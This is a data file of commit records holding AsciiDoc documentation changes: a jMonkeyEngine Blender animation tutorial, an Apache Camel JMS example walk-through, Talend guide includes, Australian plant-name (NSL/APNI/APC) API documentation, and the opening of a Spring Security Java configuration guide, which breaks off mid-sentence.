xref:jme3\/advanced\/mixamo.adoc#creating-the-rigged-animation-file.adoc[Creating The Rigged Animation File] section of this tutorial. You will see your append `Action` at the top of the list.\n. From the `NLA Editor` header, select `menu:Add[Add Tracks]`. A new track has now been added to the top of the list.\n. Click the icon:angle-double-down[] button next to the `Action` to push it down into the stack.\n. btn:[LMB] select the strip to make it the only strip selected.\n. btn:[LMB] drag the selected strip to the right until there is at least a 4 keyframe gap between the furthest strip to the right in the list and the append strip you are dragging.\n+\n[TIP]\n====\nWhen the strip is in drag mode it will be purple. While in drag mode you do not need to keep the btn:[LMB] pressed.\n====\n\n. When you are satisfied with the position, btn:[LMB] click the strip to finalize your selection. Your append strip should now be the furthest strip to the right in the list.\n+\n[TIP]\n====\nYou can use the mouse scroll wheel to shrink or expand the strip window to bring all strips into the view.\n\nYou can drag the slider, at the bottom of the strip window, to the right or left to position the strips against the side of the window.\n====\n\n. With the mouse inside the strip window, press the kbd:[N] key to open the properties window.\n. In the `Active Strip` panel, under `Strip Extents`, you will see the `End Frame` number. In the `Timeline`, set `End:` to this number. Every time you append an `Action` you must increase this number to equal the total length off all strips combined, including the gaps between strips.\n. Save your file.\n\nYour file is now ready to xref:jme3\/advanced\/mixamo#export,export].\n\n[IMPORTANT]\n====\nPrior to export:\n\nIn the `NLA Editor` make sure no `Actions` are waiting to be pushed down into the stack. 
If there are, it must be removed or made into a strip prior to export.\n\nIn the `Dope Sheet Editor` make sure no `Actions` are selected in the `Action Editor` context. If one is selected, it will be sitting at the top of the `NLA Editor` stack.\n\nAn `Action` that has not been pushed down into the `NLA Stack` will block your `NLA Strip` from playing.\n\nSome export methods bake your actions automatically on export, others don't. Test the animation in-game and if your animations are all messed up, try xref:jme3\/external\/blender.adoc#action-baking[baking them] or use a different exporter.\n====\n\nYour NLA strip should look something like this:\n\nimage::jme3\/advanced\/MixamoNLA.png[MixamoNLA.png,width=\"\",height=\"\"]\n\n\n== Notes\n\n\n* You can see a similar video demonstration of this entire process in xref:jme3.adoc#animations-and-scenes.adoc[Animations And Scenes] under the CadNav icon:long-arrow-right[] Mixamo icon:long-arrow-right[] JME Workflow heading.\n* See xref:tutorials:beginner\/hello_animation.adoc[Hello Animation] and xref:jme3\/advanced\/animation.adoc[Animation in JME3] to learn how to use your animated model.\n","returncode":0,"stderr":"","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"3bf02126876d7426a5b5f58dddd3a019c8e5b9a7","subject":"link too source broken (#3599)","message":"link too source broken (#3599)\n\n","repos":"ullgren\/camel,gnodet\/camel,tadayosi\/camel,alvinkwekel\/camel,adessaigne\/camel,christophd\/camel,zregvart\/camel,christophd\/camel,gnodet\/camel,tdiesler\/camel,pmoerenhout\/camel,alvinkwekel\/camel,DariusX\/camel,DariusX\/camel,tadayosi\/camel,pmoerenhout\/camel,adessaigne\/camel,tadayosi\/camel,nikhilvibhav\/camel,apache\/camel,cunningt\/camel,zregvart\/camel,nikhilvibhav\/camel,tdiesler\/camel,nikhilvibhav\/camel,ullgren\/camel,nicolaferraro\/camel,pmoerenhout\/camel,apache\/camel,pmoerenhout\/camel,christophd\/camel,adessaigne\/camel,tdiesler\/camel,alvinkwekel\/camel,adessaigne\/camel,cunningt\/camel,cunningt\/camel,nicolaferraro\/camel,gnodet\/camel,apache\/camel,alvinkwekel\/camel,apache\/camel,zregvart\/camel,nicolaferraro\/camel,zregvart\/camel,DariusX\/camel,nikhilvibhav\/camel,tdiesler\/camel,pax95\/camel,mcollovati\/camel,mcollovati\/camel,pax95\/camel,DariusX\/camel,apache\/camel,cunningt\/camel,christophd\/camel,apache\/camel,ullgren\/camel,mcollovati\/camel,tdiesler\/camel,mcollovati\/camel,adessaigne\/camel,cunningt\/camel,pax95\/camel,tadayosi\/camel,tadayosi\/camel,tadayosi\/camel,christophd\/camel,pax95\/camel,adessaigne\/camel,christophd\/camel,gnodet\/camel,cunningt\/camel,pmoerenhout\/camel,gnodet\/camel,nicolaferraro\/camel,pax95\/camel,pmoerenhout\/camel,tdiesler\/camel,pax95\/camel,ullgren\/camel","old_file":"docs\/user-manual\/modules\/ROOT\/pages\/walk-through-an-example.adoc","new_file":"docs\/user-manual\/modules\/ROOT\/pages\/walk-through-an-example.adoc","new_contents":"= Walk through an Example Code\n\nThis mini-guide takes you through the source code of a\nhttps:\/\/github.com\/apache\/camel-examples\/blob\/master\/examples\/camel-example-jms-file\/src\/main\/java\/org\/apache\/camel\/example\/jmstofile\/CamelJmsToFileExample.java[simple\nexample].\n\nCamel can be configured either by using xref:spring.adoc[Spring] or\ndirectly in Java - which\nhttps:\/\/github.com\/apache\/camel-examples\/blob\/master\/examples\/camel-example-jms-file\/src\/main\/java\/org\/apache\/camel\/example\/jmstofile\/CamelJmsToFileExample.java[this\nexample does].\n\nWe start with creating a xref:camelcontext.adoc[CamelContext] - 
which is\na container for xref:components::index.adoc[Components],\nxref:routes.adoc[Routes]\netc:\n\n[source,java]\n----\n CamelContext context = new DefaultCamelContext();\n----\n\nThere is more than one way of adding a Component to the CamelContext. You can\nadd components implicitly - when we set up the routing - as we do here\nfor the\nxref:components::file-component.adoc[FileComponent]:\n\n[source,java]\n----\ncontext.addRoutes(new RouteBuilder() {\n public void configure() {\n from(\"test-jms:queue:test.queue\").to(\"file:\/\/test\");\n }\n });\n----\n\nor explicitly - as we do here when we add the JMS Component:\n\n[source,java]\n----\nConnectionFactory connectionFactory = new ActiveMQConnectionFactory(\"vm:\/\/localhost?broker.persistent=false\");\n \/\/ Note we can explicitly name the component\n context.addComponent(\"test-jms\", JmsComponent.jmsComponentAutoAcknowledge(connectionFactory));\n----\n\nor explicitly using the Component DSL, which allows you to configure the components using DSL APIs and register them with the Camel context. First you will have to import the Maven package for the Component DSL:\n[source,xml]\n------------------------------------------------------------\n<dependency>\n <groupId>org.apache.camel<\/groupId>\n <artifactId>camel-componentdsl<\/artifactId>\n <version>x.x.x<\/version>\n <!-- use the same version as your Camel core version -->\n<\/dependency>\n------------------------------------------------------------\n\nand then register the component like this:\n[source,java]\n----\nConnectionFactory connectionFactory = new ActiveMQConnectionFactory(\"vm:\/\/localhost?broker.persistent=false\");\n\nComponentsBuilderFactory.jms()\n .connectionFactory(connectionFactory)\n .acknowledgementMode(1)\n .register(context, \"test-jms\");\n----\n\nThe above works with any JMS provider. If we know we are using\nxref:components::activemq-component.adoc[ActiveMQ] we can use an even simpler form using the\nhttp:\/\/activemq.apache.org\/maven\/5.5.0\/activemq-camel\/apidocs\/org\/apache\/activemq\/camel\/component\/ActiveMQComponent.html#activeMQComponent%28java.lang.String%29[`activeMQComponent()`\nmethod] while specifying the\nhttp:\/\/activemq.apache.org\/configuring-transports.html[brokerURL] used\nto connect to ActiveMQ.\n\nIn normal use, an external system would be firing messages or events\ndirectly into Camel through one of its xref:components::index.adoc[Components]\nbut we are going to use the xref:producertemplate.adoc[ProducerTemplate]\nwhich is a really easy way for testing your\nconfiguration:\n\n[source,java]\n----\nProducerTemplate template = context.createProducerTemplate();\n----\n\nNext you *must* start the Camel context. If you are using\nxref:spring.adoc[Spring] to configure the Camel context this is\nautomatically done for you; though if you are using a pure Java approach\nthen you just need to call the `start()` method:\n\n[source,java]\n----\ncamelContext.start();\n----\n\nThis will start all of the configured routing rules.\n\nSo after starting the xref:camelcontext.adoc[CamelContext], we can fire\nsome objects into\nCamel:\n\n[source,java]\n----\nfor (int i = 0; i < 10; i++) {\n template.sendBody(\"test-jms:queue:test.queue\", \"Test Message: \" + i);\n}\n----\n\n== What happens?\n\nFrom the\nxref:producertemplate.adoc[ProducerTemplate]\n- we send objects (in this case text) into the\nxref:camelcontext.adoc[CamelContext] to the Component\n_test-jms:queue:test.queue_. 
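\n\nFor reference, the fragments above fit together into one small runnable class. This is only a sketch - the class name, the final sleep and `stop()` call, and the `throws` clause are additions made here so the example is self-contained:\n\n[source,java]\n----\nimport javax.jms.ConnectionFactory;\n\nimport org.apache.activemq.ActiveMQConnectionFactory;\nimport org.apache.camel.CamelContext;\nimport org.apache.camel.ProducerTemplate;\nimport org.apache.camel.builder.RouteBuilder;\nimport org.apache.camel.component.jms.JmsComponent;\nimport org.apache.camel.impl.DefaultCamelContext;\n\npublic final class CamelJmsToFileSketch {\n\n    public static void main(String[] args) throws Exception {\n        CamelContext context = new DefaultCamelContext();\n\n        \/\/ register the JMS component under the name used by the route below\n        ConnectionFactory connectionFactory =\n                new ActiveMQConnectionFactory(\"vm:\/\/localhost?broker.persistent=false\");\n        context.addComponent(\"test-jms\", JmsComponent.jmsComponentAutoAcknowledge(connectionFactory));\n\n        \/\/ route: consume from the JMS queue and write each message out as a file\n        context.addRoutes(new RouteBuilder() {\n            public void configure() {\n                from(\"test-jms:queue:test.queue\").to(\"file:\/\/test\");\n            }\n        });\n\n        ProducerTemplate template = context.createProducerTemplate();\n        context.start();\n\n        for (int i = 0; i < 10; i++) {\n            template.sendBody(\"test-jms:queue:test.queue\", \"Test Message: \" + i);\n        }\n\n        Thread.sleep(1000); \/\/ give the route a moment to drain the queue\n        context.stop();\n    }\n}\n----\n\n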
These text objects will be\nxref:type-converter.adoc[converted automatically] into JMS Messages and\nposted to a JMS Queue named _test.queue_. When we set up the\nxref:routes.adoc[Route], we configured the\nxref:components::file-component.adoc[FileComponent] to listen off the _test.queue_.\n\nThe File xref:components::file-component.adoc[FileComponent] will take messages off the\nQueue, and save them to a directory named _test_. Every message will be\nsaved in a file that corresponds to its destination and message id.\n\nFinally, we configured our own listener in the xref:routes.adoc[Route] -\nto take notifications from the xref:components::file-component.adoc[FileComponent] and print\nthem out as text.\n\n*That's it!*\n\nIf you have the time then use 5 more minutes to\nxref:walk-through-another-example.adoc[Walk through another example]\nthat demonstrates the Spring DSL (XML based) routing.\n","old_contents":"= Walk through an Example Code\n\nThis mini-guide takes you through the source code of a\nhttps:\/\/github.com\/apache\/camel\/blob\/master\/examples\/camel-example-jms-file\/src\/main\/java\/org\/apache\/camel\/example\/jmstofile\/CamelJmsToFileExample.java[simple\nexample].\n\nCamel can be configured either by using xref:spring.adoc[Spring] or\ndirectly in Java - which\nhttps:\/\/github.com\/apache\/camel\/blob\/master\/examples\/camel-example-jms-file\/src\/main\/java\/org\/apache\/camel\/example\/jmstofile\/CamelJmsToFileExample.java[this\nexample does].\n\nWe start with creating a xref:camelcontext.adoc[CamelContext] - which is\na container for xref:components::index.adoc[Components],\nxref:routes.adoc[Routes]\netc:\n\n[source,java]\n----\n CamelContext context = new DefaultCamelContext();\n----\n\nThere is more than one way of adding a Component to the CamelContext. You can\nadd components implicitly - when we set up the routing - as we do here\nfor the\nxref:components::file-component.adoc[FileComponent]:\n\n[source,java]\n----\ncontext.addRoutes(new RouteBuilder() {\n public void configure() {\n from(\"test-jms:queue:test.queue\").to(\"file:\/\/test\");\n }\n });\n----\n\nor explicitly - as we do here when we add the JMS Component:\n\n[source,java]\n----\nConnectionFactory connectionFactory = new ActiveMQConnectionFactory(\"vm:\/\/localhost?broker.persistent=false\");\n \/\/ Note we can explicit name the component\n context.addComponent(\"test-jms\", JmsComponent.jmsComponentAutoAcknowledge(connectionFactory));\n----\n\nor explicitly using the Component DSL which allows you to configure the components using DSL APIs and register them to the camel context. First you will have the import the maven package for the Component DSL:\n[source,xml]\n------------------------------------------------------------\n<dependency>\n <groupId>org.apache.camel<\/groupId>\n <artifactId>camel-componentdsl<\/artifactId>\n <version>x.x.x<\/version>\n <!-- use the same version as your Camel core version -->\n<\/dependency>\n------------------------------------------------------------\n\nand the register the component like this:\n[source,java]\n----\nConnectionFactory connectionFactory = new ActiveMQConnectionFactory(\"vm:\/\/localhost?broker.persistent=false\");\n\nComponentsBuilderFactory.jms()\n .connectionFactory(connectionFactory)\n .acknowledgementMode(1)\n .register(context, \"test-jms\");\n----\n\nThe above works with any JMS provider. 
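Because the `JmsComponent` only needs a `javax.jms.ConnectionFactory`, swapping brokers is essentially a one-line change. As a hedged illustration - the factory class below comes from the `org.apache.activemq:artemis-jms-client` artifact and is not part of this example - the same registration against ActiveMQ Artemis might look like:\n\n[source,java]\n----\n\/\/ assumes artemis-jms-client is on the classpath\nConnectionFactory connectionFactory =\n        new org.apache.activemq.artemis.jms.client.ActiveMQJMSConnectionFactory(\"tcp:\/\/localhost:61616\");\ncontext.addComponent(\"test-jms\", JmsComponent.jmsComponentAutoAcknowledge(connectionFactory));\n----\n\n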
If we know we are using\nxref:components::activemq-component.adoc[ActiveMQ] we can use an even simpler form using the\nhttp:\/\/activemq.apache.org\/maven\/5.5.0\/activemq-camel\/apidocs\/org\/apache\/activemq\/camel\/component\/ActiveMQComponent.html#activeMQComponent%28java.lang.String%29[`activeMQComponent()`\nmethod] while specifying the\nhttp:\/\/activemq.apache.org\/configuring-transports.html[brokerURL] used\nto connect to ActiveMQ\n\nIn normal use, an external system would be firing messages or events\ndirectly into Camel through one if its xref:components::index.adoc[Components]\nbut we are going to use tha xref:producertemplate.adoc[ProducerTemplate]\nwhich is a really easy way for testing your\nconfiguration:\n\n[source,java]\n----\nProducerTemplate template = context.createProducerTemplate();\n----\n\nNext you *must* start the camel context. If you are using\nxref:spring.adoc[Spring] to configure the camel context this is\nautomatically done for you; though if you are using a pure Java approach\nthen you just need to call the start() method\n\n[source,java]\n----\ncamelContext.start();\n----\n\nThis will start all of the configured routing rules.\n\nSo after starting the xref:camelcontext.adoc[CamelContext], we can fire\nsome objects into\ncamel:\n\n[source,java]\n----\nfor (int i = 0; i < 10; i++) {\n template.sendBody(\"test-jms:queue:test.queue\", \"Test Message: \" + i);\n}\n----\n\n== What happens?\n\nFrom the\nxref:producertemplate.adoc[ProducerTemplate]\n- we send objects (in this case text) into the\nxref:camelcontext.adoc[CamelContext] to the Component\n_test-jms:queue:test.queue_. These text objects will be\nxref:type-converter.adoc[converted automatically] into JMS Messages and\nposted to a JMS Queue named _test.queue_. When we set up the\nxref:routes.adoc[Route], we configured the\nxref:components::file-component.adoc[FileComponent] to listen off the _test.queue_.\n\nThe File xref:components::file-component.adoc[FileComponent] will take messages off the\nQueue, and save them to a directory named _test_. 
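After a run, the outcome is easy to inspect with a few lines of plain Java - no Camel involved; the directory name simply matches the `file:\/\/test` endpoint configured above:\n\n[source,java]\n----\nimport java.nio.file.DirectoryStream;\nimport java.nio.file.Files;\nimport java.nio.file.Path;\nimport java.nio.file.Paths;\n\npublic class ListOutput {\n    public static void main(String[] args) throws Exception {\n        \/\/ print each file the route wrote into the test directory\n        try (DirectoryStream<Path> files = Files.newDirectoryStream(Paths.get(\"test\"))) {\n            for (Path file : files) {\n                System.out.println(file.getFileName() + \": \" + new String(Files.readAllBytes(file)));\n            }\n        }\n    }\n}\n----\n\n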
Every message will be\nsaved in a file that corresponds to its destination and message id.\n\nFinally, we configured our own listener in the xref:routes.adoc[Route] -\nto take notifications from the xref:components::file-component.adoc[FileComponent] and print\nthem out as text.\n\n*That's it!*\n\nIf you have the time then use 5 more minutes to\nxref:walk-through-another-example.adoc[Walk through another example]\nthat demonstrates the Spring DSL (XML based) routing.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3100ef34e01952afa61ec83ccef610fcc25b946a","subject":"removed several includes from PDF","message":"removed several includes from PDF\n\n(cherry picked from commit 68d76df1eaebcec983e09ba9c2b262444a79c05d)\n","repos":"chmyga\/component-runtime,chmyga\/component-runtime,chmyga\/component-runtime,chmyga\/component-runtime","old_file":"documentation\/src\/main\/antora\/modules\/ROOT\/pages\/all-in-one.adoc","new_file":"documentation\/src\/main\/antora\/modules\/ROOT\/pages\/all-in-one.adoc","new_contents":"= Talend Component Kit Developer Guide\nv{page-component-version}\n\ninclude::index-getting-started-with-tck.adoc[leveloffset=+1]\n\ninclude::index-setup-environment.adoc[leveloffset=+1]\n\ninclude::index-generating-project.adoc[leveloffset=+1]\n\ninclude::index-creating-components.adoc[leveloffset=+1]\n\ninclude::index-testing-components.adoc[leveloffset=+1]\n\ninclude::index-defining-services.adoc[leveloffset=+1]\n\ninclude::index-deploying-components.adoc[leveloffset=+1]\n","old_contents":"= Talend Component Kit Developer Guide\nv{page-component-version}\n\ninclude::index-getting-started-with-tck.adoc[leveloffset=+1]\n\ninclude::index-setup-environment.adoc[leveloffset=+1]\n\ninclude::index-generating-project.adoc[leveloffset=+1]\n\ninclude::index-creating-components.adoc[leveloffset=+1]\n\ninclude::index-testing-components.adoc[leveloffset=+1]\n\ninclude::index-defining-services.adoc[leveloffset=+1]\n\ninclude::index-deploying-components.adoc[leveloffset=+1]\n\ninclude::index-tutorials.adoc[leveloffset=+1]\n\ninclude::index-reference-guide.adoc[leveloffset=+1]\n\ninclude::documentation-rest.adoc[leveloffset=+1]\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3a5f0fea12a1c7107578fac81588886caf77524a","subject":"Update main.adoc","message":"Update main.adoc","repos":"bio-org-au\/nsl-documentation","old_file":"src\/asciidoc\/toplevel\/main.adoc","new_file":"src\/asciidoc\/toplevel\/main.adoc","new_contents":"= NSL API Documentation\nPeter McNeil <peter@nerderg.com>\nv1.0, June 2015\n:imagesdir: resources\/images\/\n:toc: left\n:toclevels: 4\n:toc-class: toc2\n:icons: font\n:iconfont-cdn: \/\/cdnjs.cloudflare.com\/ajax\/libs\/font-awesome\/4.3.0\/css\/font-awesome.min.css\n:stylesdir: resources\/style\/\n:stylesheet: asciidoctor.css\n:description: Documentation of the National Species List API\n:keywords: documentation, NSL, APNI, API, APC\n:links:\n:numbered:\n\nMain documentation for the NSL API version 1.0\n\n== Introduction\n\n=== Australian Plant Name Index (APNI)\n\nAPNI is a database for the botanical community that deals with the names of Australian plants and their usage in the scientific literature,\nwhether as a current name or synonym. 
**APNI does not recommend any particular taxonomy or nomenclature.** For a listing of\ncurrently accepted scientific names for the Australian vascular flora, see the <<Australian Plant Census (APC)>>.\nInformation available from APNI includes:\n\n* Scientific plant names;\n* Author details;\n* Original publication details (protologue), with links to a PDF in some cases via a PDF icon\n* Subsequent usage of the name in the scientific literature (in an Australian context)\n* Typification details;\n* An APC tick showing which, if any, concept has been accepted for the APC\n* State distribution (from the Australian Plant Census (APC));\n* Relevant comments and notes;\n* Links to other information such as plant distributions, descriptions and images, searched via a picture search icon.\n\nAPNI is maintained at the Centre for Australian National Biodiversity Research with staff, resources and financial\nsupport from the Australian National Herbarium, Australian National Botanic Gardens and the Australian Biological\nResources Study. The CANBR, ANBG and ABRS collaborate to further the updating and delivery of APNI and APC.\n\n=== Australian Plant Census (APC)\n\nAPC is a database of the accepted scientific names for the Australian vascular flora, ferns, gymnosperms, hornworts and\nliverworts, both native and introduced, and lists synonyms and misapplications for these names. The APC will cover all\npublished scientific plant names used in an Australian context in the taxonomic literature, but excludes taxa\nknown only from cultivation in Australia. The taxonomy and nomenclature adopted for the APC are\nendorsed by the Council of Heads of Australasian Herbaria (CHAH).\n\nFor further information about names listed in APC, including bibliographic information, secondary references and\ntypification, consult the Australian Plant Name Index (APNI). Alternatively, clicking on hyperlinked names in APC\nsearch results will link to the APNI data for any given name.\n\nInformation available through APC includes:\n\n* Accepted scientific name and author abbreviation(s);\n* Reference to the taxonomic and nomenclatural concept adopted for APC;\n* Synonym(s) and misapplications;\n* State distribution;\n* Relevant comments and notes\n\nAPC is coordinated through a network of contributors, and is maintained by the Centre for Australian National Biodiversity\nResearch with staff, resources and financial support from the Australian National Herbarium, Australian National Botanic\nGardens, Australian Biological Resources Study, CHAH and State and Territory herbaria. These organisations collaborate to\nfurther the updating and delivery of APC.\n\n=== National Species List\n\nThe National Species List is a complete database covering vascular plants, mosses, fungi, animals, etc. The data for the NSL is\nkept in disparate systems that are combined under the NSL.\n\nThe current NSL infrastructure does this via RDF web services over some semi-static datasets, \"but that is changing.\"\nWhat you see here is the start of the new NSL infrastructure that allows the separately governed datasets to be curated\nby their \"owners\" while combining them into a live, discoverable, searchable data resource with a consistent modern\ninterface.\n\nThe new infrastructure takes the existing datasets and makes them \"shards\" of the NSL. 
Each shard will be imported\nseparately into the new system as resources allow.\n\nThe new system incorporates an improved editing system and separate distributed search services, including linked data\nservices.\n\n==== What we have now\n\nWe have migrated the APNI and APC data into the new NSL system, and they form the first \"shard\". We have largely replaced\nthe old APNI services with the new services, including search and the RDF\/SPARQL interfaces. There are some outputs and\nreports that are noticeably missing, but they are being added progressively as resources allow.\n\n==== The road map\n\nWe will be adding new shards to the system as we go:\n\n . Algae\n . Lichen\n . Moss\n . Fungi\n . AFD\n\nAs we add datasets, improvements to the Editor and services will be required to cater for differing requirements; these\nchanges will be incorporated based on priorities and resources.\n\n== Using the NSL\n\ninclude::..\/leveltwo\/searching.adoc[]\n\n== Application Interfaces (APIs)\n\nThe NSL services provide a number of Application Interfaces, called APIs, to let you access the name data within.\n\ninclude::..\/leveltwo\/rest-objects.adoc[]\n\ninclude::..\/leveltwo\/name-api.adoc[]\n\ninclude::..\/leveltwo\/instance-api.adoc[]\n\ninclude::..\/leveltwo\/reference-api.adoc[]\n\ninclude::..\/leveltwo\/suggestions.adoc[]\n","old_contents":"= NSL API Documentation\nPeter McNeil <peter@nerderg.com>\nv1.0, June 2015\n:imagesdir: resources\/images\/\n:toc: left\n:toclevels: 4\n:toc-class: toc2\n:icons: font\n:iconfont-cdn: \/\/cdnjs.cloudflare.com\/ajax\/libs\/font-awesome\/4.3.0\/css\/font-awesome.min.css\n:stylesdir: resources\/style\/\n:stylesheet: asciidoctor.css\n:description: Documentation of the National Species List API\n:keywords: documentation, NSL, APNI, API, APC\n:links:\n:numbered:\n\nMain documentation for the NSL API version 1.0\n\n== Introduction\n\n=== Australian Plant Name Index (APNI)\n\nAPNI is a database for the botanical community that deals with plant names and their usage in the scientific literature,\nwhether as a current name or synonym. 
The APC will cover all\npublished scientific plant names used in an Australian context in the taxonomic literature, but excludes taxa\n(including cultivars) known only from cultivation in Australia. The taxonomy and nomenclature adopted for the APC are\nendorsed by the Council of Heads of Australasian Herbaria (CHAH).\n\nFor further information about names listed in APC, including bibliographic information, secondary references and\ntypification, consult the Australian Plant Name Index (APNI). Alternatively, clicking on hyperlinked names in APC\nsearch results will link to the APNI data for any given name.\n\nInformation available through APC includes:\n\n* Accepted scientific name and author abbreviation(s);\n* Reference to the taxonomic and nomenclatural concept adopted for APC;\n* Synonym(s) and misapplications;\n* State distribution;\n* Relevant comments and notes\n\nAPC is coordinated through a network of contributors, and is maintained by the Centre for Australian National Biodiversity\nResearch with staff, resources and financial support from the Australian National Herbarium, Australian National Botanic\nGardens, Australian Biological Resources Study, CHAH and State and Territory herbaria. These organisations collaborate to\nfurther the updating and delivery of APC.\n\n=== National Species List\n\nThe national Species is a complete database covering vascular plants, mosses, fungi, animals etc. The data for the NSL is\nkept in disparate systems that are combined under the NSL.\n\nThe current NSL infrastructure does this via RDF web services over some semi static datasets, \"but that is changing.\"\nWhat you see here is the start of the new NSL infrastructure that allows the separatly governed datasets to be curated\nby their \"owners\" while combining them into a live discoverable, searchable data resource with a consistent modern\ninterface.\n\nThe new infrastructure takes the existing datasets and makes them \"shards\" of the NSL. Each shard will be imported\nseparately into the new system as resources allow.\n\nThe new system incorporates an improved editing system and separate distributed search services, including linked data\nservices.\n\n==== What we have now\n\nWe have migrated the APNI and APC data into the new NSL system, and they form the first \"shard\". We have largely replaced\nthe old APNI services with the new services, including search and the RDF\/SPARQL interfaces. There are some outputs and\nreports that are noticably missing, but they are being added progressively as resources allow.\n\n==== The road map\n\nWe will be adding new shards to the system as we go:\n\n . Algae\n . Lichen\n . Moss\n . Fungi\n . 
AFD\n\nAs we add datasets improvements to the Editor and services will be required to cater for differing requirements, these\nchanges will be incorporated based on priorities and resources.\n\n== Using the NSL\n\ninclude::..\/leveltwo\/searching.adoc[]\n\n== Aplication Interfaces (APIs)\n\nThe NSL services provide a number of Application Interfaces, called APIs, to let you access the name data within.\n\ninclude::..\/leveltwo\/rest-objects.adoc[]\n\ninclude::..\/leveltwo\/name-api.adoc[]\n\ninclude::..\/leveltwo\/instance-api.adoc[]\n\ninclude::..\/leveltwo\/reference-api.adoc[]\n\ninclude::..\/leveltwo\/suggestions.adoc[]\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"08f68c9122dfbc2bd60dc438d2f01b884f665e91","subject":"Update JwtAuthenticationConverter Docs","message":"Update JwtAuthenticationConverter Docs\n\nReplaced usage of deprecated API\n\nFixes gh-7062\n","repos":"fhanik\/spring-security,spring-projects\/spring-security,djechelon\/spring-security,jgrandja\/spring-security,fhanik\/spring-security,fhanik\/spring-security,djechelon\/spring-security,rwinch\/spring-security,eddumelendez\/spring-security,spring-projects\/spring-security,rwinch\/spring-security,rwinch\/spring-security,spring-projects\/spring-security,fhanik\/spring-security,spring-projects\/spring-security,djechelon\/spring-security,fhanik\/spring-security,spring-projects\/spring-security,fhanik\/spring-security,eddumelendez\/spring-security,rwinch\/spring-security,rwinch\/spring-security,eddumelendez\/spring-security,spring-projects\/spring-security,eddumelendez\/spring-security,jgrandja\/spring-security,spring-projects\/spring-security,jgrandja\/spring-security,jgrandja\/spring-security,djechelon\/spring-security,jgrandja\/spring-security,djechelon\/spring-security,eddumelendez\/spring-security,rwinch\/spring-security,jgrandja\/spring-security","old_file":"docs\/manual\/src\/docs\/asciidoc\/_includes\/servlet\/preface\/java-configuration.adoc","new_file":"docs\/manual\/src\/docs\/asciidoc\/_includes\/servlet\/preface\/java-configuration.adoc","new_contents":"\n[[jc]]\n= Java Configuration\n\nGeneral support for https:\/\/docs.spring.io\/spring\/docs\/3.1.x\/spring-framework-reference\/html\/beans.html#beans-java[Java Configuration] was added to Spring Framework in Spring 3.1.\nSince Spring Security 3.2 there has been Spring Security Java Configuration support which enables users to easily configure Spring Security without the use of any XML.\n\nIf you are familiar with the <<ns-config>> then you should find quite a few similarities between it and the Security Java Configuration support.\n\nNOTE: Spring Security provides https:\/\/github.com\/spring-projects\/spring-security\/tree\/master\/samples\/javaconfig[lots of sample applications] which demonstrate the use of Spring Security Java Configuration.\n\n== Hello Web Security Java Configuration\n\nThe first step is to create our Spring Security Java Configuration.\nThe configuration creates a Servlet Filter known as the `springSecurityFilterChain` which is responsible for all the security (protecting the application URLs, validating submitted username and passwords, redirecting to the log in form, etc) within your application.\nYou can find the most basic example of a Spring Security Java Configuration below:\n\n[[jc-hello-wsca]]\n[source,java]\n----\nimport org.springframework.beans.factory.annotation.Autowired;\n\nimport org.springframework.context.annotation.*;\nimport 
org.springframework.security.config.annotation.authentication.builders.*;\nimport org.springframework.security.config.annotation.web.configuration.*;\n\n@EnableWebSecurity\npublic class WebSecurityConfig {\n\n\t@Bean\n\tpublic UserDetailsService userDetailsService() {\n\t\tInMemoryUserDetailsManager manager = new InMemoryUserDetailsManager();\n\t\tmanager.createUser(User.withDefaultPasswordEncoder().username(\"user\").password(\"password\").roles(\"USER\").build());\n\t\treturn manager;\n\t}\n}\n----\n\nThere really isn't much to this configuration, but it does a lot.\nYou can find a summary of the features below:\n\n* Require authentication for every URL in your application\n* Generate a login form for you\n* Allow the user with the *Username* _user_ and the *Password* _password_ to authenticate with form-based authentication\n* Allow the user to log out\n* https:\/\/en.wikipedia.org\/wiki\/Cross-site_request_forgery[CSRF attack] prevention\n* https:\/\/en.wikipedia.org\/wiki\/Session_fixation[Session Fixation] protection\n* Security Header integration\n** https:\/\/en.wikipedia.org\/wiki\/HTTP_Strict_Transport_Security[HTTP Strict Transport Security] for secure requests\n** https:\/\/msdn.microsoft.com\/en-us\/library\/ie\/gg622941(v=vs.85).aspx[X-Content-Type-Options] integration\n** Cache Control (can be overridden later by your application to allow caching of your static resources)\n** https:\/\/msdn.microsoft.com\/en-us\/library\/dd565647(v=vs.85).aspx[X-XSS-Protection] integration\n** X-Frame-Options integration to help prevent https:\/\/en.wikipedia.org\/wiki\/Clickjacking[Clickjacking]\n* Integrate with the following Servlet API methods:\n** https:\/\/docs.oracle.com\/javaee\/6\/api\/javax\/servlet\/http\/HttpServletRequest.html#getRemoteUser()[HttpServletRequest#getRemoteUser()]\n** https:\/\/docs.oracle.com\/javaee\/6\/api\/javax\/servlet\/http\/HttpServletRequest.html#getUserPrincipal()[HttpServletRequest#getUserPrincipal()]\n** https:\/\/docs.oracle.com\/javaee\/6\/api\/javax\/servlet\/http\/HttpServletRequest.html#isUserInRole(java.lang.String)[HttpServletRequest#isUserInRole(java.lang.String)]\n** https:\/\/docs.oracle.com\/javaee\/6\/api\/javax\/servlet\/http\/HttpServletRequest.html#login(java.lang.String,%20java.lang.String)[HttpServletRequest#login(java.lang.String, java.lang.String)]\n** https:\/\/docs.oracle.com\/javaee\/6\/api\/javax\/servlet\/http\/HttpServletRequest.html#logout()[HttpServletRequest#logout()]\n\n=== AbstractSecurityWebApplicationInitializer\n\nThe next step is to register the `springSecurityFilterChain` with the WAR.\nThis can be done in Java Configuration with https:\/\/docs.spring.io\/spring\/docs\/3.2.x\/spring-framework-reference\/html\/mvc.html#mvc-container-config[Spring's WebApplicationInitializer support] in a Servlet 3.0+ environment.\nNot surprisingly, Spring Security provides a base class `AbstractSecurityWebApplicationInitializer` that will ensure the `springSecurityFilterChain` gets registered for you.\nThe way in which we use `AbstractSecurityWebApplicationInitializer` differs depending on whether we are already using Spring or if Spring Security is the only Spring component in our application.\n\n* <<abstractsecuritywebapplicationinitializer-without-existing-spring>> - Use these instructions if you are not using Spring already\n* <<abstractsecuritywebapplicationinitializer-with-spring-mvc>> - Use these instructions if you are already using Spring\n\n=== AbstractSecurityWebApplicationInitializer without Existing Spring\n\nIf you are not using 
